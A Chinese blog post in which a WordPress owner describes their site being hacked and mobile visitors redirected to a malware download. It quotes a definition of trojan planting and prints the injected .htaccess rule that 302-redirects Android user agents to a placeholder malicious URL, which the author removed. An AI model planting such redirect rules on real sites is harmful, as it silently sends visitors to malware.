跳至主要内容

博客被挂马

博客从前天出现电脑端访问是一片空白,需要输入一个密码,联系主机客服,说是插件导致,后来查看后台发现一个不明文件存在插件文件夹中,然后删除了其中好几个个插件,网站恢复了电脑端的访问,但是我用手机访问却被跳转到另外一个网站上,危险的网站,是俄语的界面,再点击一下,出来一个下载文件,我用手机下载了测试,360手机卫士果然警报说这是危险的应用。不知道是哪个天杀的黑客,黑了我的网站,给我挂一个病毒。

我联系主机客服,他们告知说这是网站被黑了,要自己处理。

但是网上搜索“wordpress网站被黑”等相关词句出来一些并没有多大相关性的文章,后来弄明白了一般这种情况被称为“挂马”,也就是。

百度百科关于挂马的解释如下:


所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库“备份/恢复”或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。


下一步搜索到一篇文章“WordPress站点被挂马?如何预防、检测和应对?”发布于wp大学网站的。我用手机访问后恶意跳转的问题应当是重定向问题,这篇文章中就讲到.htaccess有可能被利用。结果的检查发现,果然是这货里面,出现了反常代码,至少我能看懂里面的一个url,这个url就是跳转过去的网站链接里面的。

这段恶意代码如下:


RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} “Android” [NC]
RewriteRule ^(.*)$ http://恶意网址/ [L,R=302]
RewriteOptions inherit


那我就直接给删除一试,重新上传.htaccess,再用手机访问,这就正常了。

我估计这次被挂马,可能是插件安装的问题,插件安装不宜过多。最好是通过官方后台并且经过试试与现有版本兼容的插件。

评论

寒烟说…
现在wordpress插件尽力安装知名的插件,这些大插件厂商虽然还是有漏洞爆出,但是会在第一时间发出补丁修改,而小插件就很难保证,还有一个就是wordpress尽力保持精简和备份~以备不时之需

此博客中的热门博文

武昌站面馆老板被枭首(血图慎入)

这是一件令人发怵的血腥案件。人间戾气带太重,社会怨气太深,脆弱的生命湮灭得如此仓促,几乎无法让人找出业果报应的轮回。

雷洋之死完美官收(多图)

◆ 雷洋之死真相何在 雷洋是中国人民大学环境学院2009级硕士研究生,也是中共党员,毕业后在北京工作,工作单位国务院国有资产监督管理委员会下属的中国循环经济协会,生前职务是协会生态文明中心主任。他和妻子育有一女儿,出生才一月。事发当日5.7,雷得电去机场接奶奶等人,途中被蹲守的地方警员以嫖客身份控制,经几小时的纠缠,雷不幸身亡,当日正好是其结婚纪念日。

谷歌blogger平台建立国内可访问博客攻略

一、最近关于网站的想法 建立个人独立博客,从不会到目前基本能简单搭建已经过去了3、4年了,在我最初接触到的wordcodess到dede再到discuz,这个过程以前写过一篇 文章介绍 。当时是抱了多大的希望在这上面,自己看看都觉得愚不可及,在这过程中我注册过不少的域名,换过不少的网站标题,从上手wordcodess再转移其它阵地,……哦对了,我还用xiuno轻论坛程序弄过一段时间论坛……,到近期在wordcodess坚持了比较长的一段时间,林林总总,前前后后,一句话:折腾博客本身比写博客用的心思更多,这样的历程当然是走歪了。但是这几年下来,自己虽然越来越懂一点网络异事,设置不少模板主题功能,到头来,翻翻自己以前所写的少许原创文章,更多的感觉是空洞与荒芜。为了让经常翻看博客内容的自己不感到平淡无味,将更多的心思汇焦在如何写出有价值的博文,这是每一人博主老生常谈又难以持续的事。